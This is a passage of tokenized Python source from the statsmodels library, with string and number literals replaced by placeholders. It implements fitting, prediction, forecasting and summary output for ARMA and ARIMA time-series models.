geterrors ( y , k , k_ar , k_ma , k_lags , nobs , <EOL> Z_mat , m , R_mat , T_mat , <EOL> paramsdtype ) <EOL> if isinstance ( errors , tuple ) : <EOL> errors = errors [ <NUM_LIT:0> ] <EOL> else : <EOL> y = self . endog . copy ( ) <EOL> k = self . k_exog + self . k_trend <EOL> if k > <NUM_LIT:0> : <EOL> y -= dot ( self . exog , params [ : k ] ) <EOL> k_ar = self . k_ar <EOL> k_ma = self . k_ma <EOL> ( trendparams , exparams , <EOL> arparams , maparams ) = _unpack_params ( params , ( k_ar , k_ma ) , <EOL> self . k_trend , self . k_exog , <EOL> reverse = False ) <EOL> b , a = np . r_ [ <NUM_LIT:1> , - arparams ] , np . r_ [ <NUM_LIT:1> , maparams ] <EOL> zi = zeros ( ( max ( k_ar , k_ma ) ) ) <EOL> for i in range ( k_ar ) : <EOL> zi [ i ] = sum ( - b [ : i + <NUM_LIT:1> ] [ : : - <NUM_LIT:1> ] * y [ : i + <NUM_LIT:1> ] ) <EOL> e = lfilter ( b , a , y , zi = zi ) <EOL> errors = e [ <NUM_LIT:0> ] [ k_ar : ] <EOL> return errors . squeeze ( ) <EOL> def predict ( self , params , start = None , end = None , exog = None , dynamic = False ) : <EOL> method = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> start = self . _get_predict_start ( start , dynamic ) <EOL> end , out_of_sample = self . _get_predict_end ( end , dynamic ) <EOL> if out_of_sample and ( exog is None and self . k_exog > <NUM_LIT:0> ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> endog = self . endog <EOL> resid = self . geterrors ( params ) <EOL> k_ar = self . k_ar <EOL> if exog is not None : <EOL> exog = np . asarray ( exog ) <EOL> if self . k_exog == <NUM_LIT:1> and exog . ndim == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> if out_of_sample != <NUM_LIT:0> and self . k_exog > <NUM_LIT:0> : <EOL> if self . k_exog > <NUM_LIT:0> and k_ar > <NUM_LIT:0> and not dynamic : <EOL> exog = np . vstack ( ( self . exog [ - k_ar : , self . k_trend : ] , exog ) ) <EOL> if dynamic : <EOL> if self . k_exog > <NUM_LIT:0> : <EOL> exog = np . vstack ( ( self . exog [ start - k_ar : , self . 
k_trend : ] , exog ) ) <EOL> out_of_sample += end - start + <NUM_LIT:1> <EOL> return _arma_predict_out_of_sample ( params , out_of_sample , resid , <EOL> k_ar , self . k_ma , self . k_trend , <EOL> self . k_exog , endog , exog , <EOL> start , method ) <EOL> predictedvalues = _arma_predict_in_sample ( start , end , endog , resid , <EOL> k_ar , method ) <EOL> if out_of_sample : <EOL> forecastvalues = _arma_predict_out_of_sample ( params , out_of_sample , <EOL> resid , k_ar , <EOL> self . k_ma , <EOL> self . k_trend , <EOL> self . k_exog , endog , <EOL> exog , method = method ) <EOL> predictedvalues = np . r_ [ predictedvalues , forecastvalues ] <EOL> return predictedvalues <EOL> predict . __doc__ = _arma_predict <EOL> def loglike ( self , params , set_sigma2 = True ) : <EOL> """<STR_LIT>""" <EOL> method = self . method <EOL> if method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . loglike_kalman ( params , set_sigma2 ) <EOL> elif method == '<STR_LIT>' : <EOL> return self . loglike_css ( params , set_sigma2 ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % method ) <EOL> def loglike_kalman ( self , params , set_sigma2 = True ) : <EOL> """<STR_LIT>""" <EOL> return KalmanFilter . loglike ( params , self , set_sigma2 ) <EOL> def loglike_css ( self , params , set_sigma2 = True ) : <EOL> """<STR_LIT>""" <EOL> k_ar = self . k_ar <EOL> k_ma = self . k_ma <EOL> k = self . k_exog + self . k_trend <EOL> y = self . endog . copy ( ) . astype ( params . dtype ) <EOL> nobs = self . nobs <EOL> if self . transparams : <EOL> newparams = self . _transparams ( params ) <EOL> else : <EOL> newparams = params <EOL> if k > <NUM_LIT:0> : <EOL> y -= dot ( self . exog , newparams [ : k ] ) <EOL> b , a = np . r_ [ <NUM_LIT:1> , - newparams [ k : k + k_ar ] ] , np . r_ [ <NUM_LIT:1> , newparams [ k + k_ar : ] ] <EOL> zi = np . zeros ( ( max ( k_ar , k_ma ) ) , dtype = params . 
dtype ) <EOL> for i in range ( k_ar ) : <EOL> zi [ i ] = sum ( - b [ : i + <NUM_LIT:1> ] [ : : - <NUM_LIT:1> ] * y [ : i + <NUM_LIT:1> ] ) <EOL> errors = lfilter ( b , a , y , zi = zi ) [ <NUM_LIT:0> ] [ k_ar : ] <EOL> ssr = np . dot ( errors , errors ) <EOL> sigma2 = ssr / nobs <EOL> if set_sigma2 : <EOL> self . sigma2 = sigma2 <EOL> llf = - nobs / <NUM_LIT> * ( log ( <NUM_LIT:2> * pi ) + log ( sigma2 ) ) - ssr / ( <NUM_LIT:2> * sigma2 ) <EOL> return llf <EOL> def fit ( self , start_params = None , trend = '<STR_LIT:c>' , method = "<STR_LIT>" , <EOL> transparams = True , solver = '<STR_LIT>' , maxiter = <NUM_LIT:50> , full_output = <NUM_LIT:1> , <EOL> disp = <NUM_LIT:5> , callback = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> k_ar = self . k_ar <EOL> k_ma = self . k_ma <EOL> self . transparams = transparams <EOL> endog , exog = self . endog , self . exog <EOL> k_exog = self . k_exog <EOL> self . nobs = len ( endog ) <EOL> k_trend , exog = _make_arma_exog ( endog , self . exog , trend ) <EOL> if k_ar == <NUM_LIT:0> and k_ma == <NUM_LIT:0> and k_trend == <NUM_LIT:0> and k_exog == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> _check_estimable ( len ( endog ) , k_ar + k_ma + k_exog + k_trend ) <EOL> self . k_trend = k_trend <EOL> self . exog = exog <EOL> self . exog_names = _make_arma_names ( self . data , k_trend , ( k_ar , k_ma ) , <EOL> self . exog_names ) <EOL> k = k_trend + k_exog <EOL> if k_ma == <NUM_LIT:0> and k_ar == <NUM_LIT:0> : <EOL> method = "<STR_LIT>" <EOL> self . method = method = method . lower ( ) <EOL> if method == '<STR_LIT>' : <EOL> self . nobs = len ( self . endog ) - k_ar <EOL> if start_params is not None : <EOL> start_params = np . asarray ( start_params ) <EOL> else : <EOL> start_params = self . _fit_start_params ( ( k_ar , k_ma , k ) , method ) <EOL> if transparams : <EOL> start_params = self . _invtransparams ( start_params ) <EOL> if solver == '<STR_LIT>' : <EOL> kwargs . 
setdefault ( '<STR_LIT>' , <NUM_LIT> ) <EOL> kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT> ) <EOL> kwargs . setdefault ( '<STR_LIT:m>' , <NUM_LIT:12> ) <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> mlefit = super ( ARMA , self ) . fit ( start_params , method = solver , <EOL> maxiter = maxiter , <EOL> full_output = full_output , disp = disp , <EOL> callback = callback , ** kwargs ) <EOL> params = mlefit . params <EOL> if transparams : <EOL> params = self . _transparams ( params ) <EOL> self . transparams = False <EOL> normalized_cov_params = None <EOL> armafit = ARMAResults ( self , params , normalized_cov_params ) <EOL> armafit . mle_retvals = mlefit . mle_retvals <EOL> armafit . mle_settings = mlefit . mle_settings <EOL> return ARMAResultsWrapper ( armafit ) <EOL> class ARIMA ( ARMA ) : <EOL> __doc__ = tsbase . _tsa_doc % { "<STR_LIT>" : _arima_model , <EOL> "<STR_LIT>" : _arima_params , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : _armax_notes % <EOL> { "<STR_LIT>" : "<STR_LIT>" } } <EOL> def __new__ ( cls , endog , order , exog = None , dates = None , freq = None , <EOL> missing = '<STR_LIT:none>' ) : <EOL> p , d , q = order <EOL> if d == <NUM_LIT:0> : <EOL> return ARMA ( endog , ( p , q ) , exog , dates , freq , missing ) <EOL> else : <EOL> mod = super ( ARIMA , cls ) . __new__ ( cls ) <EOL> mod . __init__ ( endog , order , exog , dates , freq , missing ) <EOL> return mod <EOL> def __init__ ( self , endog , order , exog = None , dates = None , freq = None , <EOL> missing = '<STR_LIT:none>' ) : <EOL> p , d , q = order <EOL> if d > <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> super ( ARIMA , self ) . __init__ ( endog , ( p , q ) , exog , dates , freq , missing ) <EOL> self . k_diff = d <EOL> self . _first_unintegrate = unintegrate_levels ( self . endog [ : d ] , d ) <EOL> self . endog = np . diff ( self . endog , n = d ) <EOL> _check_estimable ( len ( self . endog ) , p + q ) <EOL> if exog is not None : <EOL> self . exog = self . 
exog [ d : ] <EOL> if d == <NUM_LIT:1> : <EOL> self . data . ynames = '<STR_LIT>' + self . endog_names <EOL> else : <EOL> self . data . ynames = '<STR_LIT>' . format ( d ) + self . endog_names <EOL> def _get_predict_start ( self , start , dynamic ) : <EOL> """<STR_LIT:U+0020>""" <EOL> k_diff = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> method = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> k_ar = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if start is None : <EOL> if '<STR_LIT>' in method and not dynamic : <EOL> start = <NUM_LIT:0> <EOL> else : <EOL> start = k_ar <EOL> elif isinstance ( start , int ) : <EOL> start -= k_diff <EOL> try : <EOL> start = super ( ARIMA , self ) . _get_predict_start ( start , <EOL> dynamic ) <EOL> except IndexError : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( start + k_diff ) ) <EOL> else : <EOL> start = _validate ( start , k_ar , k_diff , self . data . dates , <EOL> method ) <EOL> start = super ( ARIMA , self ) . _get_predict_start ( start , dynamic ) <EOL> self . _set_predict_start_date ( start + k_diff ) <EOL> return start <EOL> def _get_predict_end ( self , end , dynamic = False ) : <EOL> """<STR_LIT>""" <EOL> end , out_of_sample = super ( ARIMA , self ) . _get_predict_end ( end , dynamic ) <EOL> if '<STR_LIT>' not in self . method and not dynamic : <EOL> end -= self . k_ar <EOL> return end - self . k_diff , out_of_sample <EOL> def fit ( self , start_params = None , trend = '<STR_LIT:c>' , method = "<STR_LIT>" , <EOL> transparams = True , solver = '<STR_LIT>' , maxiter = <NUM_LIT:50> , full_output = <NUM_LIT:1> , <EOL> disp = <NUM_LIT:5> , callback = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> mlefit = super ( ARIMA , self ) . fit ( start_params , trend , <EOL> method , transparams , solver , <EOL> maxiter , full_output , disp , <EOL> callback , ** kwargs ) <EOL> normalized_cov_params = None <EOL> arima_fit = ARIMAResults ( self , mlefit . _results . 
params , <EOL> normalized_cov_params ) <EOL> arima_fit . k_diff = self . k_diff <EOL> arima_fit . mle_retvals = mlefit . mle_retvals <EOL> arima_fit . mle_settings = mlefit . mle_settings <EOL> return ARIMAResultsWrapper ( arima_fit ) <EOL> def predict ( self , params , start = None , end = None , exog = None , typ = '<STR_LIT>' , <EOL> dynamic = False ) : <EOL> if isinstance ( start , ( string_types , datetime ) ) : <EOL> start = _index_date ( start , self . data . dates ) <EOL> if typ == '<STR_LIT>' : <EOL> if not dynamic or ( start != self . k_ar + self . k_diff and <EOL> start is not None ) : <EOL> return super ( ARIMA , self ) . predict ( params , start , end , exog , <EOL> dynamic ) <EOL> else : <EOL> q = self . k_ma <EOL> self . k_ma = <NUM_LIT:0> <EOL> predictedvalues = super ( ARIMA , self ) . predict ( params , start , <EOL> end , exog , <EOL> dynamic ) <EOL> self . k_ma = q <EOL> return predictedvalues <EOL> elif typ == '<STR_LIT>' : <EOL> endog = self . data . endog <EOL> if not dynamic : <EOL> predict = super ( ARIMA , self ) . predict ( params , start , end , exog , <EOL> dynamic ) <EOL> start = self . _get_predict_start ( start , dynamic ) <EOL> end , out_of_sample = self . _get_predict_end ( end ) <EOL> d = self . k_diff <EOL> if '<STR_LIT>' in self . method : <EOL> start += d - <NUM_LIT:1> <EOL> end += d - <NUM_LIT:1> <EOL> if out_of_sample : <EOL> fv = predict [ : - out_of_sample ] + endog [ start : end + <NUM_LIT:1> ] <EOL> if d == <NUM_LIT:2> : <EOL> fv += np . diff ( endog [ start - <NUM_LIT:1> : end + <NUM_LIT:1> ] ) <EOL> levels = unintegrate_levels ( endog [ - d : ] , d ) <EOL> fv = np . r_ [ fv , <EOL> unintegrate ( predict [ - out_of_sample : ] , <EOL> levels ) [ d : ] ] <EOL> else : <EOL> fv = predict + endog [ start : end + <NUM_LIT:1> ] <EOL> if d == <NUM_LIT:2> : <EOL> fv += np . diff ( endog [ start - <NUM_LIT:1> : end + <NUM_LIT:1> ] ) <EOL> else : <EOL> k_ar = self . 
k_ar <EOL> if out_of_sample : <EOL> fv = ( predict [ : - out_of_sample ] + <EOL> endog [ max ( start , self . k_ar - <NUM_LIT:1> ) : end + k_ar + <NUM_LIT:1> ] ) <EOL> if d == <NUM_LIT:2> : <EOL> fv += np . diff ( endog [ start - <NUM_LIT:1> : end + <NUM_LIT:1> ] ) <EOL> levels = unintegrate_levels ( endog [ - d : ] , d ) <EOL> fv = np . r_ [ fv , <EOL> unintegrate ( predict [ - out_of_sample : ] , <EOL> levels ) [ d : ] ] <EOL> else : <EOL> fv = predict + endog [ max ( start , k_ar ) : end + k_ar + <NUM_LIT:1> ] <EOL> if d == <NUM_LIT:2> : <EOL> fv += np . diff ( endog [ start - <NUM_LIT:1> : end + <NUM_LIT:1> ] ) <EOL> else : <EOL> if start == self . k_ar + self . k_diff or start is None : <EOL> p = self . k_ar <EOL> q = self . k_ma <EOL> k_exog = self . k_exog <EOL> k_trend = self . k_trend <EOL> k_diff = self . k_diff <EOL> ( trendparam , exparams , <EOL> arparams , maparams ) = _unpack_params ( params , ( p , q ) , <EOL> k_trend , <EOL> k_exog , <EOL> reverse = True ) <EOL> self . k_ma = <NUM_LIT:0> <EOL> predict = super ( ARIMA , self ) . predict ( params , start , end , <EOL> exog , dynamic ) <EOL> if not start : <EOL> start = self . _get_predict_start ( start , dynamic ) <EOL> start += k_diff <EOL> self . k_ma = q <EOL> return endog [ start - <NUM_LIT:1> ] + np . cumsum ( predict ) <EOL> else : <EOL> predict = super ( ARIMA , self ) . predict ( params , start , end , <EOL> exog , dynamic ) <EOL> return endog [ start - <NUM_LIT:1> ] + np . cumsum ( predict ) <EOL> return fv <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % typ ) <EOL> predict . __doc__ = _arima_predict <EOL> class ARMAResults ( tsbase . TimeSeriesModelResults ) : <EOL> """<STR_LIT>""" <EOL> _cache = { } <EOL> def __init__ ( self , model , params , normalized_cov_params = None , scale = <NUM_LIT:1.> ) : <EOL> super ( ARMAResults , self ) . __init__ ( model , params , normalized_cov_params , <EOL> scale ) <EOL> self . sigma2 = model . sigma2 <EOL> nobs = model . nobs <EOL> self . 
nobs = nobs <EOL> k_exog = model . k_exog <EOL> self . k_exog = k_exog <EOL> k_trend = model . k_trend <EOL> self . k_trend = k_trend <EOL> k_ar = model . k_ar <EOL> self . k_ar = k_ar <EOL> self . n_totobs = len ( model . endog ) <EOL> k_ma = model . k_ma <EOL> self . k_ma = k_ma <EOL> df_model = k_exog + k_trend + k_ar + k_ma <EOL> self . _ic_df_model = df_model + <NUM_LIT:1> <EOL> self . df_model = df_model <EOL> self . df_resid = self . nobs - df_model <EOL> self . _cache = resettable_cache ( ) <EOL> @ cache_readonly <EOL> def arroots ( self ) : <EOL> return np . roots ( np . r_ [ <NUM_LIT:1> , - self . arparams ] ) ** - <NUM_LIT:1> <EOL> @ cache_readonly <EOL> def maroots ( self ) : <EOL> return np . roots ( np . r_ [ <NUM_LIT:1> , self . maparams ] ) ** - <NUM_LIT:1> <EOL> @ cache_readonly <EOL> def arfreq ( self ) : <EOL> r"""<STR_LIT>""" <EOL> z = self . arroots <EOL> if not z . size : <EOL> return <EOL> return np . arctan2 ( z . imag , z . real ) / ( <NUM_LIT:2> * pi ) <EOL> @ cache_readonly <EOL> def mafreq ( self ) : <EOL> r"""<STR_LIT>""" <EOL> z = self . maroots <EOL> if not z . size : <EOL> return <EOL> return np . arctan2 ( z . imag , z . real ) / ( <NUM_LIT:2> * pi ) <EOL> @ cache_readonly <EOL> def arparams ( self ) : <EOL> k = self . k_exog + self . k_trend <EOL> return self . params [ k : k + self . k_ar ] <EOL> @ cache_readonly <EOL> def maparams ( self ) : <EOL> k = self . k_exog + self . k_trend <EOL> k_ar = self . k_ar <EOL> return self . params [ k + k_ar : ] <EOL> @ cache_readonly <EOL> def llf ( self ) : <EOL> return self . model . loglike ( self . params ) <EOL> @ cache_readonly <EOL> def bse ( self ) : <EOL> params = self . params <EOL> hess = self . model . hessian ( params ) <EOL> if len ( params ) == <NUM_LIT:1> : <EOL> return np . sqrt ( - <NUM_LIT:1.> / hess [ <NUM_LIT:0> ] ) <EOL> return np . sqrt ( np . diag ( - inv ( hess ) ) ) <EOL> def cov_params ( self ) : <EOL> params = self . params <EOL> hess = self . model . 
hessian ( params ) <EOL> return - inv ( hess ) <EOL> @ cache_readonly <EOL> def aic ( self ) : <EOL> return - <NUM_LIT:2> * self . llf + <NUM_LIT:2> * self . _ic_df_model <EOL> @ cache_readonly <EOL> def bic ( self ) : <EOL> nobs = self . nobs <EOL> return - <NUM_LIT:2> * self . llf + np . log ( nobs ) * self . _ic_df_model <EOL> @ cache_readonly <EOL> def hqic ( self ) : <EOL> nobs = self . nobs <EOL> return - <NUM_LIT:2> * self . llf + <NUM_LIT:2> * np . log ( np . log ( nobs ) ) * self . _ic_df_model <EOL> @ cache_readonly <EOL> def fittedvalues ( self ) : <EOL> model = self . model <EOL> endog = model . endog . copy ( ) <EOL> k_ar = self . k_ar <EOL> exog = model . exog <EOL> if exog is not None : <EOL> if model . method == "<STR_LIT>" and k_ar > <NUM_LIT:0> : <EOL> exog = exog [ k_ar : ] <EOL> if model . method == "<STR_LIT>" and k_ar > <NUM_LIT:0> : <EOL> endog = endog [ k_ar : ] <EOL> fv = endog - self . resid <EOL> return fv <EOL> @ cache_readonly <EOL> def resid ( self ) : <EOL> return self . model . geterrors ( self . params ) <EOL> @ cache_readonly <EOL> def pvalues ( self ) : <EOL> df_resid = self . df_resid <EOL> return t . sf ( np . abs ( self . tvalues ) , df_resid ) * <NUM_LIT:2> <EOL> def predict ( self , start = None , end = None , exog = None , dynamic = False ) : <EOL> return self . model . predict ( self . params , start , end , exog , dynamic ) <EOL> predict . __doc__ = _arma_results_predict <EOL> def _forecast_error ( self , steps ) : <EOL> sigma2 = self . sigma2 <EOL> ma_rep = arma2ma ( np . r_ [ <NUM_LIT:1> , - self . arparams ] , <EOL> np . r_ [ <NUM_LIT:1> , self . maparams ] , nobs = steps ) <EOL> fcasterr = np . sqrt ( sigma2 * np . cumsum ( ma_rep ** <NUM_LIT:2> ) ) <EOL> return fcasterr <EOL> def _forecast_conf_int ( self , forecast , fcasterr , alpha ) : <EOL> const = norm . ppf ( <NUM_LIT:1> - alpha / <NUM_LIT> ) <EOL> conf_int = np . 
c_ [ forecast - const * fcasterr , <EOL> forecast + const * fcasterr ] <EOL> return conf_int <EOL> def forecast ( self , steps = <NUM_LIT:1> , exog = None , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if exog is not None : <EOL> exog = np . asarray ( exog ) <EOL> if self . k_exog == <NUM_LIT:1> and exog . ndim == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> elif exog . ndim == <NUM_LIT:1> : <EOL> if len ( exog ) != self . k_exog : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> exog = exog [ None , : ] <EOL> if exog . shape [ <NUM_LIT:0> ] != steps : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . k_ar > <NUM_LIT:0> : <EOL> exog = np . vstack ( ( self . model . exog [ - self . k_ar : , self . k_trend : ] , <EOL> exog ) ) <EOL> forecast = _arma_predict_out_of_sample ( self . params , <EOL> steps , self . resid , self . k_ar , <EOL> self . k_ma , self . k_trend , <EOL> self . k_exog , self . model . endog , <EOL> exog , method = self . model . method ) <EOL> fcasterr = self . _forecast_error ( steps ) <EOL> conf_int = self . _forecast_conf_int ( forecast , fcasterr , alpha ) <EOL> return forecast , fcasterr , conf_int <EOL> def summary ( self , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> from statsmodels . iolib . summary import Summary <EOL> model = self . model <EOL> title = model . __class__ . __name__ + '<STR_LIT>' <EOL> method = model . method <EOL> k_diff = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if '<STR_LIT>' in method : <EOL> start = k_diff <EOL> else : <EOL> start = k_diff + self . k_ar <EOL> if self . data . dates is not None : <EOL> dates = self . data . dates <EOL> sample = [ dates [ start ] . strftime ( '<STR_LIT>' ) ] <EOL> sample += [ '<STR_LIT>' + dates [ - <NUM_LIT:1> ] . strftime ( '<STR_LIT>' ) ] <EOL> else : <EOL> sample = str ( start ) + '<STR_LIT>' + str ( len ( self . data . orig_endog ) ) <EOL> k_ar , k_ma = self . k_ar , self . 
k_ma <EOL> if not k_diff : <EOL> order = str ( ( k_ar , k_ma ) ) <EOL> else : <EOL> order = str ( ( k_ar , k_diff , k_ma ) ) <EOL> top_left = [ ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , [ model . __class__ . __name__ + order ] ) , <EOL> ( '<STR_LIT>' , [ method ] ) , <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , [ sample [ <NUM_LIT:0> ] ] ) , <EOL> ( '<STR_LIT>' , [ sample [ <NUM_LIT:1> ] ] ) <EOL> ] <EOL> top_right = [ <EOL> ( '<STR_LIT>' , [ str ( len ( self . model . endog ) ) ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . llf ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . sigma2 ** <NUM_LIT> ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . aic ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . bic ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . hqic ] ) ] <EOL> smry = Summary ( ) <EOL> smry . add_table_2cols ( self , gleft = top_left , gright = top_right , <EOL> title = title ) <EOL> smry . add_table_params ( self , alpha = alpha , use_t = False ) <EOL> from statsmodels . iolib . table import SimpleTable <EOL> if k_ma and k_ar : <EOL> arstubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ar + <NUM_LIT:1> ) ] <EOL> mastubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ma + <NUM_LIT:1> ) ] <EOL> stubs = arstubs + mastubs <EOL> roots = np . r_ [ self . arroots , self . maroots ] <EOL> freq = np . r_ [ self . arfreq , self . mafreq ] <EOL> elif k_ma : <EOL> mastubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ma + <NUM_LIT:1> ) ] <EOL> stubs = mastubs <EOL> roots = self . maroots <EOL> freq = self . mafreq <EOL> elif k_ar : <EOL> arstubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ar + <NUM_LIT:1> ) ] <EOL> stubs = arstubs <EOL> roots = self . arroots <EOL> freq = self . arfreq <EOL> else : <EOL> stubs = [ ] <EOL> if len ( stubs ) : <EOL> modulus = np . abs ( roots ) <EOL> data = np . column_stack ( ( roots . real , roots . 
imag , modulus , freq ) ) <EOL> roots_table = SimpleTable ( data , <EOL> headers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> title = "<STR_LIT>" , <EOL> stubs = stubs , <EOL> data_fmts = [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> smry . tables . append ( roots_table ) <EOL> return smry <EOL> def summary2 ( self , title = None , alpha = <NUM_LIT> , float_format = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> from pandas import DataFrame <EOL> k_diff = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if '<STR_LIT>' in self . model . method : <EOL> start = k_diff <EOL> else : <EOL> start = k_diff + self . k_ar <EOL> if self . data . dates is not None : <EOL> dates = self . data . dates <EOL> sample = [ dates [ start ] . strftime ( '<STR_LIT>' ) ] <EOL> sample += [ dates [ - <NUM_LIT:1> ] . strftime ( '<STR_LIT>' ) ] <EOL> else : <EOL> sample = str ( start ) + '<STR_LIT>' + str ( len ( self . data . orig_endog ) ) <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> if k_ma and k_ar : <EOL> arstubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ar + <NUM_LIT:1> ) ] <EOL> mastubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ma + <NUM_LIT:1> ) ] <EOL> stubs = arstubs + mastubs <EOL> roots = np . r_ [ self . arroots , self . maroots ] <EOL> freq = np . r_ [ self . arfreq , self . mafreq ] <EOL> elif k_ma : <EOL> mastubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ma + <NUM_LIT:1> ) ] <EOL> stubs = mastubs <EOL> roots = self . maroots <EOL> freq = self . mafreq <EOL> elif k_ar : <EOL> arstubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ar + <NUM_LIT:1> ) ] <EOL> stubs = arstubs <EOL> roots = self . arroots <EOL> freq = self . arfreq <EOL> else : <EOL> stubs = [ ] <EOL> if len ( stubs ) : <EOL> modulus = np . abs ( roots ) <EOL> data = np . column_stack ( ( roots . real , roots . imag , modulus , freq ) ) <EOL> data = DataFrame ( data ) <EOL> data . 
columns = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> data . index = stubs <EOL> from statsmodels . iolib import summary2 <EOL> smry = summary2 . Summary ( ) <EOL> model_info = summary2 . summary_model ( self ) <EOL> model_info [ '<STR_LIT>' ] = self . model . method <EOL> model_info [ '<STR_LIT>' ] = sample [ <NUM_LIT:0> ] <EOL> model_info [ '<STR_LIT:U+0020>' ] = sample [ - <NUM_LIT:1> ] <EOL> model_info [ '<STR_LIT>' ] = "<STR_LIT>" % self . sigma2 ** <NUM_LIT> <EOL> model_info [ '<STR_LIT>' ] = "<STR_LIT>" % self . hqic <EOL> model_info [ '<STR_LIT>' ] = str ( len ( self . model . endog ) ) <EOL> params = summary2 . summary_params ( self ) <EOL> smry . add_dict ( model_info ) <EOL> smry . add_df ( params , float_format = float_format ) <EOL> if len ( stubs ) : <EOL> smry . add_df ( data , float_format = "<STR_LIT>" ) <EOL> smry . add_title ( results = self , title = title ) <EOL> return smry <EOL> def plot_predict ( self , start = None , end = None , exog = None , dynamic = False , <EOL> alpha = <NUM_LIT> , plot_insample = True , ax = None ) : <EOL> from statsmodels . graphics . utils import _import_mpl , create_mpl_ax <EOL> _ = _import_mpl ( ) <EOL> fig , ax = create_mpl_ax ( ax ) <EOL> forecast = self . predict ( start , end , exog , dynamic ) <EOL> start = self . model . _get_predict_start ( start , dynamic = False ) <EOL> end , out_of_sample = self . model . _get_predict_end ( end , dynamic = False ) <EOL> if out_of_sample : <EOL> steps = out_of_sample <EOL> fc_error = self . _forecast_error ( steps ) <EOL> conf_int = self . _forecast_conf_int ( forecast [ - steps : ] , fc_error , <EOL> alpha ) <EOL> if hasattr ( self . data , "<STR_LIT>" ) : <EOL> from pandas import Series <EOL> forecast = Series ( forecast , index = self . data . predict_dates ) <EOL> ax = forecast . plot ( ax = ax , label = '<STR_LIT>' ) <EOL> else : <EOL> ax . plot ( forecast ) <EOL> x = ax . get_lines ( ) [ - <NUM_LIT:1> ] . 
get_xdata ( ) <EOL> if out_of_sample : <EOL> label = "<STR_LIT>" . format ( <NUM_LIT:1> - alpha ) <EOL> ax . fill_between ( x [ - out_of_sample : ] , conf_int [ : , <NUM_LIT:0> ] , conf_int [ : , <NUM_LIT:1> ] , <EOL> color = '<STR_LIT>' , alpha = <NUM_LIT> , label = label ) <EOL> if plot_insample : <EOL> ax . plot ( x [ : end + <NUM_LIT:1> - start ] , self . model . endog [ start : end + <NUM_LIT:1> ] , <EOL> label = self . model . endog_names ) <EOL> ax . legend ( loc = '<STR_LIT>' ) <EOL> return fig <EOL> plot_predict . __doc__ = _plot_predict <EOL> class ARMAResultsWrapper ( wrap . ResultsWrapper ) : <EOL> _attrs = { } <EOL> _wrap_attrs = wrap . union_dicts ( tsbase . TimeSeriesResultsWrapper . _wrap_attrs , <EOL> _attrs ) <EOL> _methods = { } <EOL> _wrap_methods = wrap . union_dicts ( tsbase . TimeSeriesResultsWrapper . _wrap_methods , <EOL> _methods ) <EOL> wrap . populate_wrapper ( ARMAResultsWrapper , ARMAResults ) <EOL> class ARIMAResults ( ARMAResults ) : <EOL> def predict ( self , start = None , end = None , exog = None , typ = '<STR_LIT>' , <EOL> dynamic = False ) : <EOL> return self . model . predict ( self . params , start , end , exog , typ , dynamic ) <EOL> predict . __doc__ = _arima_results_predict <EOL> def _forecast_error ( self , steps ) : <EOL> sigma2 = self . sigma2 <EOL> ma_rep = arma2ma ( np . r_ [ <NUM_LIT:1> , - self . arparams ] , <EOL> np . r_ [ <NUM_LIT:1> , self . maparams ] , nobs = steps ) <EOL> fcerr = np . sqrt ( np . cumsum ( cumsum_n ( ma_rep , self . k_diff ) ** <NUM_LIT:2> ) * sigma2 ) <EOL> return fcerr <EOL> def _forecast_conf_int ( self , forecast , fcerr , alpha ) : <EOL> const = norm . ppf ( <NUM_LIT:1> - alpha / <NUM_LIT> ) <EOL> conf_int = np . c_ [ forecast - const * fcerr , forecast + const * fcerr ] <EOL> return conf_int 